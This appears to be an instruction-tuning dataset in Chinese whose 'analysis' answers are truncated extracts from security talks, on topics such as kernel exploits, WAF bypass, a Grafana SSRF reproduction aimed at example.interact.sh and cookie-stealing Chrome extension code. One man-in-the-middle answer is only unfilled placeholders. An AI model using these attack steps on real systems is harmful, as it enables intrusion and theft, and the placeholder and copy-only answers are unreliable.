{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKERNEL WARS: KERNEL-EXPLOITATION DEMYSTIFIED Introduction to kernel-mode vulnerabilities and exploitation  Why exploit kernel level vulnerabilities?  It's fun!  Relatively few are doing it  Bypasses defense mechanisms and restrictions  Attacks at the lowest level  Does not rely on any particular application being installed  Does not rely on how applications are configured  Does not rely on file / registry permissions Introduction to kernel-mode vulnerabilities and exploitation  Reasons not to exploit kernel level vulnerabilities  Usually one-shot, exploit needs to be very reliable  Kernel debugging can be tedious setting up  Need some knowledge about kernel internals Introduction to kernel-mode vulnerabilities and exploitation  Common targets for attack in a kernel  Systemcalls  I/O and IOCTL-messages through devicefiles  Handling of files in pseudofilesystems (like procfs)  Handling of data from the network (wireless/wired)  Interaction with hardware (USB, Firewire, etc)  Executable file format loaders (ELF, PE, etc) Introduction to kernel-mode vulnerabilities and exploitation  Payload strategy  Elevating privileges  Altering the UID-field (Unix)  Stealing access tokens (Windows)  Breaking chroot / jail / SELinux / other restrictions  Everything can be bypassed in kernel-mode  Ring 0: One ring to rule them all..  Injecting backdoors  Stealth! Do everything in kernel-mode Introduction to kernel-mode vulnerabilities and exploitation  Payload techniques  Determining addresses and offsets  Resolving symbols  Pattern matching  Hardcoding (last resort) Introduction to kernel-mode vulnerabilities and exploitation  Payload techniques  OS/architecture-specific techniques  Windows/x86: ETHREAD-pointer at 0xFFDFF124 (fs:0x124)  FreeBSD/x86: proc-pointer at [fs:0]  Linux/x86: task_struct-pointer at esp & 0xffffe000  NetBSD/x86: proc-pointer [[fs:4]+20]+16  Solaris/AMD64: _kthread-pointer at [gs:0x18]  Solaris/i386: _kthread-pointer at [gs:0x10]  Solaris/SPARC: _kthread-pointer", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJUST WHAT THE DOCTOR ORDERED? SCOTT ERVEN Founder/President  SecMedic @scotterven SHAWN MERDINGER Healthcare Security Researcher Founder  MedSec LinkedIn Group @medseclinkedin 1 Why Research Medical Devices?  Patient Safety & Quality Patient Care  To Equip Defenders In Assessing & Protecting These Life Saving Devices  Directly Contributes To & Affects Healthcare Organizations Mission and Values 2 Disclosure Process Overview  April 30th  SMB Findings Disclosed To DHS/ICS-CERT  May 5th  SMB Detailed Briefing With DHS/ICS-CERT  May 20th  Additional Disclosure To DHS/ICS-CERT for Defibs, Healthcare Orgs  Ongoing Assistance Provided To Federal Agencies, Healthcare Organizations and Manufacturers 3 What Will Be Revealed?  No Zero Days  Most Vulnerabilities Not From This Decade  Threat Modeling  Connecting The Dots  Medical Device Exposure From Public Internet 4 Bad News  The external findings pose a significant risk to patient safety and medical devices  We located most of these external risks within 1 hour utilizing only previously disclosed vulnerabilities and open source reconnaissance  These findings provide support that Healthcare is 10 years behind other industries in addressing security 5 Good News  These significant external risks can be mitigated easily  The external risks can be identified by an organization within 1 hour using open source reconnaissance tools  The external findings can be remediated with little to no investment from an organization 6 Review of Previous Research  Lab Systems  Refrigeration Storage  PACS  Imaging  MRI/CT  Implantable Cardiac Defibrillators  External Cardiac Defibrillators  Infusion Pumps  Medical Device Integration 7 Review of Previous Research - Top Risks  Hard-Coded Privileged Accounts  Unencrypted Web Applications & Web Services/Interfaces  Excessive Services With No Operational Use Case  System Updates & Patching 8 Phase II Research  Why Do More?  Many have been misinformed that medical devices can not be accessed by an attac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrypto for Hackers Eijah v1.00 August 7th, 2015 Shall we play a game?  Joshua/WOPR Hello World Free Party Tonight! 4  www.demonsaw.com  www.defconparties.com Who am I? 5  Founder  Programmer  Hacker Last year at Defcon  Saving Cyberspace by Reinventing File Sharing  Were losing our right to privacy and free speech  The abuse of power by the strong  Crypto is really difficult  Lifelong dedication  Can we filter out the noise?  Can we make it easy to understand?  We need to take back control  Becoming powerful again 6 Trust Convenience Control Change \"Know thy self, know thy enemy. A thousand battles, a thousand victories.  Sun Tzu, general and author of The Art of War A World Without Secrets A Formidable Ally  Crypto is our strongest weapon  Considered a military weapon in the USA until 1992  Many different uses  Protect out secrets  Expose the secrets of others  Poor crypto implementations  A common denominator to the Internet  What is the government thinking?  Banning encryption?  Providing backdoors? 8 Becoming More Powerful  Technology as the deciding factor  We are stronger than governments & corporations  Crypto is a complex and difficult subject  The secret  Ubiquitous  Pervasive  Easy  The will of the people  Battle cry for a new generation of hackers 9 Battle Cry 10 Encryption is the defense against the dark arts.  Edward Snowden The Algorithms Terminology  Crypto(graphy)  The practice and study of techniques for secure communication in the presence of third-parties.  Cipher  An algorithm for performing encryption or decryption.  Encryption, Decryption  The process of encoding messages or information in such a way that only authorized parties can read it (and vice versa).  Plaintext, Cleartext  Unencrypted messages or information.  Ciphertext  Encrypted messages or information.  Random Number Generator (RNG)  Device designed to generate a sequence of numbers or symbols that lack any pattern 12 Terminology  Key  A parameter that determines the functional outp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmultipart-parse.md 5/19/2021 1 / 33 从RFC规范看如何绕过waf上传表单 背景介绍 传统waf以规则匹配为主如果只是差别的使规则匹配整个数据包当规则数量逐渐变多会造成更多性能 损耗当然还会发误报情况为了能够解决这些问题需要对数据包进解析进精准位置的规则匹配 正常业务中上传表单使普遍不仅能够传参还可以进文件的上传当然这也是个很好的攻击点waf想 要能够精准拦截针对表单的攻击需要进multipart/form-data格式数据的解析并针对每个部分如参数 值文件名文件内容进针对性的规则匹配拦截 虽然RFC规范了multipart/form-data相关的格式与解析但是由于不同后端程序的实现机制不同且RFC相关 文档也会进增加补充最终导致解析式各不相同对于waf来说很难做到对各个后端程序进定制化解 析尤其是云waf更加法实现 所以本文主要讨论利waf和后端程序对multipart/form-data的解析差异造成对waf的bypass multipart/form-data相关RFC: 基于表单的文件上传: RFC1867 multipart/form-data: RFC7578 Multipart Media Type: RFC2046#section-5.1 解析环境 Flask/Werkzeug解析环境docker/httpbin Java解析环境Windows10 pro 20H2/Tomcat9.0.35/jdk1.8.0_271/commons-fileupload Java输出代码 String result = \"\"; DiskFileItemFactory factoy = new DiskFileItemFactory(); ServletFileUpload sfu = new ServletFileUpload(factoy); try { List<FileItem> list = sfu.parseRequest(req); for (FileItem fileItem : list) { if (fileItem.getName() == null) { result += fileItem.getFieldName() + \": \" + fileItem.getString() + \"\\n\"; } else { result += \"filename: \" + fileItem.getName() + \" \" + fileItem.getFieldName() + \": \" + fileItem.getString() + \"\\n\"; } } } catch (FileUploadException e) { // TODO Auto-generated catch block e.printStackTrace(); } multipart-parse.md 5/19/2021 2 / 33 PHP解析环境Ubuntu18.04/Apache2.4.29/PHP7.2.24 PHP输出代码 <?php var_dump($_FILES); var_dump($_POST); 基础格式 POST /post HTTP/1.1 Host: www.example.com:8081 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Connection: close Content-Type: multipart/form-data; boundary=I_am_a_boundary Content-Length: 303 --I_am_a_boundary Content-Disposition: form-data; name=\"name\"; filename=\"file.jsp\" Content-Type: text/plain;charset=UTF-8 This_is_file_content. --I_am_a_boundary Content-Disposition: form-data; name=\"key\"; Content-Type: text/plain;charset=UTF-8 This_is_a_value. --I_am_a_boundary-- 此表单数据含有个文件name为namefilename为file.jsp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Ether Wars: Exploits, counter-exploits and honeypots on Ethereum AUGUST 11, 2019 ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 2 About ConsenSys Diligence and MythX  We audit smart contracts and build security tools for smart contract developers  Other who contributed to / influenced this talk:  Joran Honig, Nikhil Parasaram, Nathan Peercy (Mythril Core Team)  Sam Sun (shared his bot research)  Many other researchers  The awesome Ethereum security community ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum In this Talk Fast symbolic execution of EVM bytecode Exploit automation Exploiting script kiddies Exploiting those who try to exploit script kiddies ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 4  Distributed state machine What is Ethereum? ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 5  Small programs written in a simple, stack-based language  Immutable: Once deployed they cant be changed  Executing instructions costs gas  Computation in a single transaction is bounded by the block gas limit  However, state can be mutated over multiple transactions EVM Smart Contracts ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 6 Symbolic Execution (1) grantSurvival == True grantSurvival == False JUMPI STOP SELFDEST RUCT CALLDATA LOAD ISZERO ISZERO CALLDATA LOAD ISZERO ISZERO JUMPI [] [0x1] [0x0] [0x1] [] [] [0x0] [0x1] [0x0] [] ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 7 Symbolic Execution (2) Symbolic Calldata JUMPI STOP SELFDEST RUCT CALLDATA LOAD ISZERO ISZERO [] [sym_calldata] [bool(sym_calldata == 0)] [bool(sym_calldata == 0) == 0)] bool(sym_calldata == 0) == 0) == True bool(sym_calldata == 0) == 0) == False ConsenSys Diligence | The Ether Wars: Exploits, counter-exploits and honeypots on Ethereum 8 H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Docker 使用笔记 --- <center><h1>Docker 使用笔记</h1></center> --- ## 0x00 前言 平时在使用 Docker 时经常会碰到忘记相关命令的情况因此平时忘记一个就会记录一个经过多年的记录Docker 相关的笔记已经记录了不少 最近在看代码审计的时候又提到了 Docker正好借着这个机会好好的把原来记录的比较乱的 Docker 笔记整理一下 如果你也面临过在使用 Docker 时时不时就会忘记某条命令的情况那么我相信本篇文章应该会对你有所帮助 ## 0x01 安装 ### 1安装 Docker ``` curl -fsSL https://get.docker.com/ | sh ``` 或者 ``` wget -qO- https://get.docker.com/ | sh ``` 在命令中输入以下命令如果输出 helloword 表示 Docker 安装成功 ``` docker run ubuntu echo \"helloworld\" ``` ![](https://teamssix.oss-cn-hangzhou.aliyuncs.com/202110282041924.png?x-oss-process=image/auto-orient,1/quality,q_80/watermark,bucket_teamssix,image_VGVhbXNTaXhXaW5YaW5Mb2dvLnBuZz94LW9zcy1wcm9jZXNzPWltYWdlL3Jlc2l6ZSxQXzM4,x_10,y_10) ### 2安装 Docker-Compose ``` sudo curl -L \"https://github.com/docker/compose/releases/download/1.23.2/docker-compose-$(uname -s)-$(uname -m)\" -o /usr/local/bin/docker-compose sudo chmod +x /usr/local/bin/docker-compose docker-compose --version ``` ### 3Docker 设置国内镜像源 ``` vi /etc/docker/daemon.json { \"registry-mirrors\": [\"http://hub-mirror.c.163.com\"] } systemctl restart docker.service ``` 国内加速地址如下 ``` Docker中国区官方镜像 https://registry.docker-cn.com 网易 http://hub-mirror.c.163.com 中国科技大学 https://docker.mirrors.ustc.edu.cn 阿里云容器 服务 https://cr.console.aliyun.com/ ``` ## 0x02 使用 ### 1搜索镜像 ``` docker search centos ``` ### 2拉取镜像 ``` docker pull centos ``` ### 3查看镜像文件 ``` docker images ``` 查看镜像层级关系 ``` docker images tree # 以前这个命令是 docker images --tree ``` ### 4查看docker所有进程 ``` docker ps -a ``` ### 5开启容器 开启指定容器这里的容器名为 Web ``` docker start web ``` 启动所有容器 ``` docker start $(docker ps -aq) ``` ### 6进入正在运行的容器 docker 创建的 ``` docker attach web ``` docker-compose 创建的 container_name 需要在 docker-compose.yml 文件中查看 ``` docker-compose exec container_name bash ``` ### 7指定端口启动创建进入容器 ``` docker run -p 9992:80 -p 8882:8888 -it ubuntu /bin/bash docker run --name web1 -p 9991:80 -p 8881:8888 -it centos /bin/bash ``` ### 8导出导入镜像 export\\import 导入导出 ``` docker export web > /home/docker_web.tar docker import /home/d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n分类建议 计算机软件开发安全 人民邮电出版社网址www.ptpress.com.cn 上册 上册 逆向工程权威指南 逆 向 工 程 权 威 指 南 逆向工程是一种分析目标系统的过程 本书专注于软件逆向工程即研究编译后的可执行程序本书是写给初学者 的一本权威指南全书共分为12个部分共102章涉及软件逆向工程相关 的众多技术话题堪称是逆向工程技术百科全书全书讲解详细附带丰富 的代码示例还给出了很多习题来帮助读者巩固所学的知识附录部分给出 了习题的解答 本书适合对逆向工程技术操作系统底层技术程序分析技术感兴趣的读者 阅读也适合专业的程序开发人员参考 ... 谨向这本出色的教程致以个人的敬意!  Herbert Bos阿姆斯特丹自由大学教授 Modern Operating Systems (4th Edition)作者 ... 引人入胜值得一读!  Michael Sikorski Practical Malware Analysis的作者 作者简介 Dennis Yurichev乌克兰程序员安全技术专家读者可以 通过https://yurichev.com/联系他并获取和本书相关的更多 学习资料 R e v e r s e E n g i n e e r i n g f o r B e g i n n e r s 权威指南 上册 [乌克兰] Dennis Yurichev著 Archer 安天安全研究与应急处理中心译 逆向工程 Reverse Engineering for Beginners Reverse Engineering Windows ARM iOS Linux Reversing 美术编辑董志桢  了解逆向工程的权威指南  初学者必备的大百科全书  安天网络安全工程师培训必读书目 FM43445逆向工程权威指南 上.indd 1-3 17-3-6 上午11:19 异步社区会员 dearfuture(15918834820) 专享 尊重版权 权威指南 上册 [乌克兰] Dennis Yurichev著 Archer 安天安全研究与应急处理中心译 逆向工程 Reverse Engineering for Beginners Reverse Engineering 人 民 邮 电 出 版 社 北 京 FM43445逆向工程权威指南 上.indd 4 17-3-6 上午11:20 异步社区会员 dearfuture(15918834820) 专享 尊重版权 版 权 声 明 Simplified Chinese translation copyright 2017 by Posts and Telecommunications Press ALL RIGHTS RESERVED Reverse Engineering for Beginners, by Dennis Yurichev Copyright  2016 by Dennis Yurichev 本书中文简体版由作者 Dennis Yurichev 授权人民邮电出版社出版未经出版者书面许可对本书的任 何部分不得以任何方式或任何手段复制和传播 版权所有侵权必究  著 [乌克兰] Dennis Yurichev 译 Archer 安天安全研究与应急处理中心 责任编辑 陈冀康 责任印制 焦志炜  人民邮电出版社出版发行 北京市丰台区成寿寺路 11 号 邮编 100164 电子邮件 315@ptpress.com.cn 网址 http://www.ptpress.com.cn 北京天宇星印刷厂印刷  开本7871092 1/16 印张61.5 彩插1 字数1 990 千字 2017 年 4 月第 1 版 印数1  3 000 册 2017 年 4 月北京第 1 次印刷 著作权合同登记号 图字01-2014-3227 号 定价168.00 元上下册 读者服务热线(010)81055410 印装质量热线(010)81055316 反盗版热线(010)81055315 异步社区会员 dearfuture(15918834820) 专享 尊重版权 内 内 容 容 提 提 要 要 逆向工程是一种分析目标系统的过程旨在识别系统的各组件以及组件间关系以便能够通过其他形 式或在较高的抽象层次上重建系统的表征 本书专注于软件的逆向工程是写给初学者的一本权威指南全书共分为上下两册十二个部分 共 102 章涉及 X86/X64ARM/ARM-64MIPSJava/JVM 等重要内容详细解析了 Oracle RDBMSItanium 软件狗LD_PRELOAD栈溢出ELFWin32 PE 文件格式x86-64critical sectionssyscalls线程本 地存储 TLS地址无关代码PIC以", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGame of Chromes Owning the Web with Zombie Chrome Extensions Tomer Cohen April 2016 Sign-up Graph 1000 RPM 9000 RPM This is what we currently know 10 Sec Attack Page Attack Page Google Web Store Extension Course of Action Inject Code Into Facebook tabs Open Wix Frame Transparently inside a Facebook page Sign Up to Wix Bypassing bot detection /register /register Extension Course of Action Inject Code Into Facebook tabs Open Wix Frame Inside a Facebook page Sign Up to Wix Bypassing bot detection Publish Wix Website That leads to attack page Distribute Link Among all Facebook friends Review Extension In Google Web Store The objective: Use Wix as a distributor to form a bot net Bot Masters: What Do They Want? Send Spam DDoS Attacks Scrape Websites Click Frauds June 2016 April 2016 API Tag Me If You Can User Click Facebook Friends Extension New Payload Instance This Magical Bot What makes a good bot Blacklists Cookies & Flow Control Mouse Movement Javascript Challenges Goal: Look Human Browser Extension: The Perfect Bot { \"update_url\": \"https://clients2.google.com/ service/update2/crx\", \"background\": { \"scripts\": [ \"view.js\" ] }, \"browser_action\": { \"default_icon\": \"viadeo.png\", \"default_popup\": \"index.html\" }, \"content_scripts\": [ { \"js\": [ \"jquery.js\", \"crack.js\" ], \"matches\": [ \"*://*.viadeo.com/*\" ] } ], What An Extension Can Do \"description\": \"Permet de profiter des avantages d'un compte vi \"icons\": { \"128\": \"viadeo.png\", \"16\": \"viadeo.png\", \"48\": \"viadeo.png\" }, \"manifest_version\": 2, \"name\": \"Viad30 Unlocker\", \"permissions\": [ \"tabs\", \"*://*.viadeo.com/\", \"storage\", \"webNavigation\", \"http://*/*\", \"https://*/*\", \"cookies\", \"webRequest\", \"webRequestBlocking\" ], \"version\": \"3.4\", \"content_security_policy\": \"script-src 'self' 'unsafe-eval'; ob } Extension Manifest Use a copy of an existing extension Cross-origin request ability Background script Snatch user cookies from chrome.tabs.onUpdated.addListener(function(gdhndztwu, ylvmbrzaez, ypujhmpyy) { var xhr_obj = juykhj", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Grafana Admin Portal SSRF [中文版本Chinese Version](README.zh-cn.md) Grafana is a multi-platform open source analytics and interactive visualization web application. The admin user is able to make requests to an unintended location in all versions of Grafana. References: - <https://github.com/RandomRobbieBF/grafana-ssrf> ## Vulnerable environment Execute following command to start a Grafana 8.5.4: ``` docker compose up -d ``` Then you can see the portal page for Grafana without the authentication in `http://your-ip:3000`, because this server enabled the anonymous as admins by: ```ini [auth.anonymous] enabled = true org_role = Admin ``` If Grafana ask you for user credentials in real world, can try default `admin` and `admin`. ## Vulnerability Reproduce Use [this POC](https://github.com/RandomRobbieBF/grafana-ssrf) to reproduce the SSRF: ``` python grafana-ssrf.py -H http://your-ip:3000 -u http://example.interact.sh/attack ``` ![](1.png) As you can see, I got the request from Grafana: ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释中间人攻击的原理和防护方法", "input": "", "output": "中间人攻击是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" -*- nroff -*- .\\\" Copyright 1998 Andries E. Brouwer (aeb@cwi.nl) .\\\" .\\\" May be distributed under the GNU General Public License .TH BLOCKDEV 8 \"May 2000\" \"\" .SH NAME blockdev \\- 从命令行调用区块设备控制程序 .SH 总览SYNOPSIS .B blockdev .RI [ options ] .I commands devices .SH 描述DESCRIPTION .B blockdev 工具允许从命令行调用区块设备控制程序 .SH 选项OPTIONS .TP .B \\-V 打印版本信息并退出 .TP .B \\-q 安静 .TP .B \\-v 详细信息 .SH 命令COMMANDS .TP .B \\--setro 设置只读模式 .TP .B \\--setrw 设置读写模式 .TP .B \\--getro 只读模式检测如果是只读模式显示1否则显示0 .TP .B \\--getss 用字节为单位打印扇区大小一般是512字节 .TP .B \\--getsize 显示设备容量使用512个字节大小的扇区为单位 .TP .BI \\--setra \" N\" 设置预读扇区512字节为 .I N 个 .TP .B \\--getra 打印预读扇区512字节 .TP .B \\--flushbufs 刷新缓存 .TP .B \\--rereadpt 重读分区表 .SH \"[中文版维护人]\" .B billpan <billpan@netease.com> .SH \"[中文版最新更新]\" .BR 2002/01/10 .SH \"中国linux论坛man手册页翻译计划:\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nweb 0x00 ida88 32 char 1 char*: 432232, 32bit464 short int : 2 int 4 unsigned int : 4 float: 4 double: 8 long: 4 long long: 8 unsigned long: 4 64 char 1 char*(): 8 short int : 2 int 4 unsigned int : 4 float: 4 double: 8 long: 8 long long: 8 unsigned long: 8 apache apr_off_t8 64request_rec 0x01 a1request_rec29 0e8h10232232829ida8 8 apr_int64intint4apr_int64long8232 0x02 request_rec *ifdefine- 0 0 The pool associated with the request apr_pool_t *pool; 1 8 The connection to the client conn_rec *connection; 2 16 The virtual host for this request server_rec *server; 3 24 Pointer to the redirected request if this is an external redirect request_rec *next; 4 32 Pointer to the previous request if this is an internal redirect request_rec *prev; 5 40 Pointer to the main request if this is a sub-request * (see http_request.h) request_rec *main; 6 48 First line of request char *the_request; 7 56 HTTP/0.9, \"simple\" request (e.g. GET /foo\\n w/no headers) int assbackwards; 8 60 A proxy request (calculated during post_read_request/translate_name) * possible values PROXYREQ_NONE, PROXYREQ_PROXY, PROXYREQ_REVERSE,*PROXYREQ_RESPONSE int proxyreq; 9 64 HEAD request, as opposed to GET int header_only; 10 68 Protocol version number of protocol; 1.1 = 1001 int proto_num; 11 72 Protocol string, as given to us, or HTTP/0.9 const char *protocol; 12 80 Host, as set by full URI or Host: header.* For literal IPv6 addresses, this does NOT include the surrounding [ ] const char *hostname; 13 88 Time when the request started apr_time_t request_time; 14 96 Status line, if set by script const char *status_line; 15 104 /** Status line */ int status; 16 108 /** M_GET, M_POST, etc. */ int method_number; 17 112 /** Request method (eg. GET, HEAD, POST, etc.) */ const char *method; 18 120 'allowed' is a bitvector of the allowed methods. ap_method_mask_t allowed; 19 128 /** Array of extension methods */ apr_array_header_t *allowed_xmethods; 20 136 /** List of allowed methods */ ap_method_list_t *allowed_me", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeaponizing data science for social engineering: Automated E2E spear phishing on Twitter John Seymour and Philip Tully {jseymour, ptully}@zerofox.com Introduction and Abstract Historically, machine learning for information security has prioritized defense: think intrusion detection systems, malware classification and botnet traffic identification. Offense can benefit from data just as well. Social networks, especially Twitter with its access to extensive personal data, botfriendly API, colloquial syntax and prevalence of shortened links, are the perfect venues for spreading machinegenerated malicious content. We present a recurrent neural network that learns to tweet phishing posts targeting specific users. The model is trained using spear phishing pentesting data, and in order to make a clickthrough more likely, it is dynamically seeded with topics extracted from timeline posts of both the target and the users they retweet or follow. We augment the model with clustering to identify high value targets based on their level of social engagement such as their number of followers and retweets, and measure success using clickrates of IPtracked links. Taken together, these techniques enable the world's first automated endtoend spear phishing campaign generator for Twitter. Contents Introduction and Abstract 1 Background Machine Learning: An Offensive Approach Highlevel Description of Tool Target Discovery Automated Spear Phishing Conclusion References 2 3 3 4 4 5 6 1 Background Historically, the security community has used Machine Learning (ML) in a defensive manner, for example in classifying malicious binaries or finding anomalous network traffic. Even now, startups continue to spring up advertising novel techniques for detecting inbound threats. But much of InfoSec is dedicated to identifying critical weaknesses and vulnerabilities through offense. While tools such as Metasploit [1] exist for automating RedTeam activities, there has been little work toward using ML as ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTriton and Symbolic execution on GDB bananaappletw @ HITCON 2017/08/26 $whoami  陳威伯(bananaappletw)  Master of National Chiao Tung University  Organizations:  Software Quality Laboratory  Bamboofox member  Vice president of NCTUCSC  Specialize in:  symbolic execution  binary exploit  Talks:  HITCON CMT 2015 Outline  Why symbolic execution?  Symbolic execution?  Triton  SymGDB Why symbolic execution? In the old days  Static analysis  Dynamic analysis Static analysis  objdump  IDA PRO Dynamic analysis  GDB  ltrace  strace Symbolic execution!!! What is symbolic execution?  Symbolic execution is a means of analyzing a program to determine what inputs cause each part of a program to execute  System-level  S2e(https://github.com/dslab-epfl/s2e)  User-level  Angr(http://angr.io/)  Triton(https://triton.quarkslab.com/)  Code-based  klee(http://klee.github.io/) Symbolic execution Z == 12 fail() \"OK\" Triton  Website: https://triton.quarkslab.com/  A dynamic binary analysis framework written in C++.  developed by Jonathan Salwan  Python bindings  Triton components:  Symbolic execution engine  Tracer  AST representations  SMT solver Interface Triton Structure Symbolic execution engine  The symbolic engine maintains:  a table of symbolic registers states  a map of symbolic memory states  a global set of all symbolic references Step Register Instruction Set of symbolic expressions init eax = UNSET None  1 eax = φ1 mov eax, 0 {φ1=0} 2 eax = φ2 inc eax {φ1=0,φ2=φ1+1} 3 eax = φ3 add eax, 5 {φ1=0,φ2=φ1+1,φ3=φ2+5} Triton Tracer  Tracer provides:  Current opcode executed  State context (register and memory)  Translate the control flow into AST Representations  Pin tracer support AST representations  Triton converts the x86 and the x86-64 instruction set semantics into AST representations  Triton's expressions are on SSA form  Instruction: add rax, rdx  Expression: ref!41 = (bvadd ((_ extract 63 0) ref!40) ((_ extract 63 0) ref!39))  ref!41 is the new expression of the RAX register  ref!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNoSQL, No Injection !? By. Kuon Agenda  What is NoSQL  Types of NoSQL  Who use NoSQL concept?  NoSQL Architecture  Security Problem  Prevention and Detection !? What is NoSQL χ No SQL (statement) χ No SQL Injection  Not only a SQL  Non-RDBMS  Semi-structured  Schema-less Types of NoSQL 1. Key-value based 2. Column-based 3. Document-based 4. Graph-based 5. Object-based 6.  Why NoSQL 1. Performance 2. Scalability Who use NoSQL concept? 1. Cloud Computing  (SaaS Security) 2. SNS 3. Portal Website  Mixed Databases NoSQL Architecture 1. Web Application & Web Service 2. Client Library  The key factor  Query-method 3. NoSQL Database NoSQL Vulnerabilities 1. Connection Pollution 2. JSON Injection 3. View Injection 4. Key Bruteforce NoSQL Vulnerabilities 1. Connection Pollution  RESTful  Cross-Database/-Pool Access  CouchDBs Global and DB Handler Ex:  NoSQL.connect(http://.$Pool./HIT2010/)  NoSQL.connect(http://POOL/.$Database) Document-based Problem (CouchDB) 2. JSON InjectionData  DRYDont Repeat Yourself  The weakness is String type  Using Collection type  escapeJSON()/unescapeJSON()  When handling tainted strings Document-based Problem (CouchDB) 3. View InjectionApplication  CouchDB's view is using SpiderMonkey as Scripting Engine  What is View? CouchApp   Predefined View and Temporary View  Evil Map/Reduce Key-Value based Problem 4. Key Bruteforce  Schema-free   How to make faster attacks?  Depends on implementation of client library & architecture  CHALLENGECan I make context-sensitive attack? http://IP/app/action?key=1aD33rSq Ex:  $value = NoSQL.Get($key) Key-Value based Problem 4. Key Bruteforce Prevention (Application-level)  Key Size  Key Space  Unpredictable Key Generation  Challenge-based NoSQL vs. WAS 1. Unknown Error Message  Logic-based Blind Injection when XQL is exist  Time-based Differential Attack? 2. Different Types of Attack Payload 1. Languages 2. Schema-less  Redefine Attack Surface (Entry Point Sensitive than RDBMS) 3. Different Concepts of Attack NoSQ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHE$ACHILLES'$HEEL$OF$CFI 关于 CFI 0 1 CFI 是什么 2005年微软研究院联合学术界提出的一项漏洞利用缓解技术 用于防御利用内存破坏漏洞来获得软件行为控制权的外部攻击 确保程序执行时的控制流转移符合事先确定的控制流图 关于 CFI 0 2 CFI 的实现 Clang CFI Microsoft Control Flow Guard Intel Control-Flow Enforcement Technology Microsoft eXtended Flow Guard Clang CFI 0 3 Clang CFI 如何工作 -fsanitize=cfi-cast-strict: Enables strict cast checks. -fsanitize=cfi-derived-cast: Base-to-derived cast to the wrong dynamic type. -fsanitize=cfi-unrelated-cast: Cast from void* or another unrelated type to the wrong dynamic type. -fsanitize=cfi-nvcall: Non-virtual call via an object whose vptr is of the wrong dynamic type. -fsanitize=cfi-vcall: Virtual call via an object whose vptr is of the wrong dynamic type. -fsanitize=cfi-icall: Indirect call of a function with wrong dynamic type. -fsanitize=cfi-mfcall: Indirect call via a member function pointer with wrong dynamic type Clang CFI 0 4 Clang CFI 如何工作 Clang CFI 0 5 Clang CFI 如何工作 Clang CFI 0 6 Clang CFI 的问题 适用的场合受限 缺少对 Backward-Edge 的保护 Microsoft Control Flow Guard 0 7 CFG 如何工作 Microsoft Control Flow Guard 0 8 CFG 的问题 CFG 是一个粗粒度的 CFI 实现 已知多种针对 CFG 的绕过技术 缺少对 Backward-Edge 的保护 Intel Control-Flow Enforcement Technology 0 9 CET 如何工作 Intel Control-Flow Enforcement Technology 1 0 CET 的问题 依赖特定的硬件 IBT 也是一个粗粒度的 CFI 实现 多数针对 CFG 的绕过技术也适用于 IBT Microsoft eXtended Flow Guard 1 1 XFG 如何工作 Microsoft eXtended Flow Guard 1 2 XFG 如何工作 Microsoft eXtended Flow Guard 1 3 如何绕过 XFG 控制流图中 fan-in fan-out 的数量会显著影响 CFI 的有效性 Variable Arguments Generic Function Object JavaScript Function 1 4 function f() { alert(\"This is a JavaScript Function.\"); } var o = f; o(); JavaScript Function 1 5 Js::ScriptFunction ScriptFunction ScriptFunctionBase JavascriptFunction DynamicObject RecyclableObject FinalizableObject IRecyclerVisitedObject VFT*? vftable; Type? *? type; Var*? auxSlots; ArrayObject *?objectArray;? ConstructorCache*?constructorCache; FunctionInfo*?functionInfo; FrameDisplay*?environment;? ActivationObjectEx *?cachedScopeObj; bool?hasInlineCaches; JavaScript ", "category": "text_analysis", "source": "security_papers"}
